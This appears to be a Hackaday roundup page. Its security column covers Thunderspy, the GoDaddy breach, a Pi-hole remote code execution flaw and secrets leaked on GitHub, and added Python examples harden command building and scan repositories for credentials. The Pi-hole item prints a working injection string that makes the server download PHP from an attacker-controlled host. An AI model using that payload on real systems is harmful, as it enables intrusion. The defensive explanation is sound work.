This excellent content from the Hackaday writing crew highlights recurring topics and popular series like Linux-Fu, 3D-Printering, Hackaday Links, This Week in Security, Inputs of Interest, Profiles in Science, Retrotechtacular, Ask Hackaday, Teardowns, Reviews, and many more.
Hackaday editors Mike Szczys and Elliot Williams explore the coolest hacks of the past 168 hours. The big news this week: will Wink customers pony up $5 a month to turn their lights on and off? There’s a new open source design for a pick and place machine. You may not have a Vectrex gaming console, but there’s a scratch-built board that can turn your oscilloscope into one. And you just can’t miss this LED sign technology that programs every pixel using projection mapping.
Take a look at the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into Firewire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over Firewire.
Once the vulnerability was made public, hardware and software vendors took steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks: a user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or Thunderbolt device, and read the firmware directly off the Thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks this enables is turning the security level down to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters in practice. The threat model is the evil maid: a laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other, potentially better, attack options. There is a narrow circumstance where Thunderspy is the perfect technique: a device with an encrypted drive that has been powered on and logged into, but is locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component of their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to depend on Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject malicious JavaScript that lies dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
GoDaddy Breaches
GoDaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. GoDaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple: just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized, so the trailing text is parsed as additional curl arguments. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
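The root cause here is a URL interpolated into a shell command string, so the quote characters in the blocklist setting break out and become new curl arguments. The following is an added example, not Pi-hole’s own code (which is PHP and shell): it models that flawed pattern in Python and sits it beside the hardened form, where the URL is validated and the argument vector is passed directly so no shell ever parses it. The payload string is the one quoted above; `blocklist.tmp` and the function names are assumptions.

```python
import shlex
from urllib.parse import urlparse

# Constructed sample inputs: the injection string from the write-up above, and a benign URL.
MALICIOUS_URL = 'http://192.168.122.1#" -o fun.php -d "'
BENIGN_URL = "https://example.invalid/blocklist.txt"


def build_command_unsafe(url: str) -> list:
    """Mirror of the flawed pattern: the URL is dropped into a shell command string.
    Returns the argv the shell would actually hand to curl, so the effect is visible
    without running anything."""
    cmd = f'curl -s "{url}" -o blocklist.tmp'
    return shlex.split(cmd)


def validate_blocklist_url(url: str) -> str:
    """Accept only absolute http(s) URLs without whitespace or quote characters.
    Rejecting non-http(s) schemes also stops a value starting with '-' from being
    read by curl as an option."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError("blocklist must be an absolute http(s) URL")
    if any(c.isspace() or c in "\"'" for c in url):
        raise ValueError("blocklist URL contains disallowed characters")
    return url


def build_command_safe(url: str) -> list:
    """Hardened form: validate first, then build argv as a list. Passing a list to
    subprocess.run() (shell=False) means the URL is always exactly one argument."""
    return ["curl", "-s", validate_blocklist_url(url), "-o", "blocklist.tmp"]


if __name__ == "__main__":
    print("shell would run:", build_command_unsafe(MALICIOUS_URL))
    print("hardened argv:", build_command_safe(BENIGN_URL))
    try:
        build_command_safe(MALICIOUS_URL)
    except ValueError as exc:
        print("rejected:", exc)
```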
Leaking on Github
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching GitHub for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password on the command line, thinking you were authenticating with SSH or sudo? It’s an easy mistake to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us: make sure to sanitize projects before pushing code to GitHub.
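A simple way to act on that lesson is a check that runs before a push and flags the files and strings the story above mentions. This is an added example, not code from [Tillson] or from GitHub: it scans a mapping of path to content (here a constructed sample repository, with made-up values) for the filenames called out above plus private-key material and hard-coded credential assignments. The filename set and regexes are assumptions to be tuned per project.

```python
import re
from typing import Dict, List, Tuple

# Filenames the write-up above calls out, plus common key-material files.
SENSITIVE_NAMES = {".bash_history", "vim_settings.xml", "id_rsa", ".env"}
SENSITIVE_SUFFIXES = (".pem", ".key", ".p12")

# Content patterns: PEM private keys and credential-looking assignments.
PATTERNS = {
    "private-key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "credential-assignment": re.compile(
        r"(?i)\b(api[_-]?key|secret|password|token)\b\s*[:=]\s*['\"]?[^\s'\"]{8,}"
    ),
}


def scan_files(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, reason) findings; an empty list means the push looks clean."""
    findings = []
    for path, content in files.items():
        name = path.rsplit("/", 1)[-1]
        if name in SENSITIVE_NAMES or name.endswith(SENSITIVE_SUFFIXES):
            findings.append((path, "sensitive filename"))
        for label, pattern in PATTERNS.items():
            if pattern.search(content):
                findings.append((path, label))
    return findings


# Constructed sample repository; none of these values are real credentials.
SAMPLE_REPO = {
    "src/app.py": 'API_KEY = "EXAMPLEKEY1234567890"\nprint("hello")\n',
    "home/.bash_history": "ssh user@host\nhunter2example\nls\n",
    "deploy/server.pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n",
    "README.md": "# Project\nNo secrets here.\n",
}

if __name__ == "__main__":
    for path, reason in scan_files(SAMPLE_REPO):
        print(f"{path}: {reason}")
```

Wired into a pre-push hook, a non-empty result is the signal to abort the push and review the flagged files.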
For many of us, our passion for electronics and science originated with curiosity about some device, a computer, radio, or even a car. The subject of this book has just such an origin. However, how many of us made this discovery and pursued this path during times of hunger or outright famine?
That’s the remarkable story of William Kamkwamba that’s told in the book, The Boy Who Harnessed the Wind. Remarkable because it culminates with his building a windmill (more correctly called a wind turbine) that powered lights in his family’s house all by the young age of fifteen. As you’ll see, it’s also the story of an unyielding thirst for knowledge in the face of famine and doubt by others.
I am a fan of the saying that those who don’t know history are doomed to repeat it. After all, humans have been building things for a number of centuries and we should learn from the engineers of the past. While you can learn a lot studying successes, sometimes — maybe even most of the time — we learn more from studying failure. The US Navy’s Mark 14 torpedo certainly has a lot to teach us.
The start of the story was the WWI-era Mark 10 torpedo which was fine for its day, but with faster destroyers and some additional data about how to best sink enemy ships it seemed necessary to build a new torpedo that would be faster, carry more explosive charge, and use a new method of detonation. Work started in 1931 with a $143,000 budget which may sound laughable today, but that was a lot of coin in the 1930s. Adjusted for inflation, that’s about $2.5 million.
In the two months since the harsh realities of SARS-CoV-2 and COVID-19 have come into sharp focus, Americans have become increasingly familiar with a man who has been quietly serving the people since the days when Ronald Reagan was up for re-election. For many, Dr. Anthony Fauci is the national voice of reason in a sea of dubious information. He has arguably become the most trustworthy person the government has to offer in the face of this pandemic.
Officially, Dr. Fauci is the Director of the National Institute of Allergy and Infectious Diseases (NIAID), a position he was appointed to in 1984. He has worked under six presidents, advising them on every outbreak from the HIV/AIDS epidemic up through Zika and Ebola. Now, he is part of the White House’s coronavirus task force.
At 79 years old, he still works 18-hour days, sticking it to infectious diseases with one hand, and smoothing the feathers of the American people with the other. Dr. Fauci certainly feels like the right person at the right time. So how did he get to this point?
There are many ways in which one’s youth can be misspent, most of which people wish they’d done when they get older and look back on their own relatively boring formative years. I misspent my youth pulling TV sets out of dumpsters and fixing them or using their parts in my projects. I recognise with hindsight that there might have been a few things I could have done with more street cred, but for me, it was broken TVs.
Today if you wanted a little gadget to sit on your shelf and let you play classic games from the early console era, you’d likely reach for the Raspberry Pi. With slick emulator front-ends like RetroPie and DIY kits available on Amazon, you don’t even need to be a technical wizard or veteran penguin wrangler to set it up. If you can follow an online tutorial, you can easily cram the last few decades of gaming into a cheap and convenient package.
But things were a bit different back in 2005. There weren’t a lot of options for playing old games on the big screen, and what was out there tended to be less than ideal. You could hack an original Xbox or gut an old laptop to make an emulation box that could comfortably blend in with your DVD player, but that wasn’t exactly in everyone’s wheelhouse. Besides, what if you had the original cartridges and just wanted to play them on a slightly more modern system?
I’m willing to bet whoever wrote this owns a katana.
Enter Messiah, and their Generation NEX console. As you might have gathered from their ever-so-humble name, Messiah claimed their re-imagined version of the Nintendo Entertainment System would “Bring Gaming Back to Life” by playing the original cartridges with enhanced audio and visual clarity. It also featured integrated support for wireless controllers, which at the time was only just becoming the standard on contemporary consoles. According to the manufacturer, the Generation NEX used custom hardware based on the “NES algorithm” that offered nearly 100% game compatibility.
Unfortunately, the system was a complete bomb. Despite Messiah’s claims, the Generation NEX ended up being yet another “NES-on-a-chip” (NOAC) clone, and a pretty poor one at that. Reviewers at the time reported compatibility issues with many popular titles, despite the fact that they were listed as working on Messiah’s website. The touted audio and video improvements were nowhere to be found, and in fact many users claimed the original NES looked and sounded better in side-by-side comparisons.
It didn’t matter how slick the console looked or how convenient the wireless controllers were; if the games themselves didn’t play well, the system was doomed. Predictably the company folded not long after, leaving owners stuck with the over-priced and under-performing consoles. Realistically, most of them ended up in landfills. Today we’ll take a look inside a relatively rare survivor and see just what nostalgic gamers got for their money in 2005.